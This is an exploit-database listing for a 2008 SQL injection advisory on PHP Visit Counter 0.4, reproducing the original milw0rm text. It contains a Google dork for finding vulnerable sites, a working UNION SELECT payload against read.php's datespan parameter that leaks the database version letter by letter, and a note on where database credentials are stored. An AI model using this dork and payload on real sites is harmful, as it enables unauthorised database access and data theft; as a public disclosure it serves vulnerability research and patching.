PHP Visit Counter - exploit.company

vendor:

PHP Visit Counter

by:

Lidloses_Auge

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP Visit Counter

Affected Version From: 0.4

Affected Version To: 0.4

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PHP Visit Counter <= 0.4 - SQL Injection Vulnerability

The vulnerability is an SQL injection vulnerability in the read.php file. The output is displayed as INT, so the attacker has to convert it into ASCII and scan every single letter to get the whole name. The MySQL data is stored in the Counterpath/variables.php file.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

###############################################################
#
#           PHP Visit Counter <= 0.4 - SQL Injection Vulnerability
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   GPM, Free-Hack, Ciphercrew, h4ck-y0u
#      Date:                        30.05.2008
#
###############################################################
#                                                             
#      Dork:  inurl:"read.php?datespan="
#
#      Vulnerability:
#
#      1.) SQL Injection
#
#         1.1.) [Target]/read.php?action=read&cat=portal&datespan=null+group+by+null+union+select+1,2,ascii(substring(version(),1,1))/*
#
#      Notes:
#
#         Output is displayed as INT, so you've to convert it into ascii and
#         scan every single letter to get the whole name.
#         MySQL Data is stored in [Counterpath]/variables.php
#
###############################################################

# milw0rm.com [2008-05-31]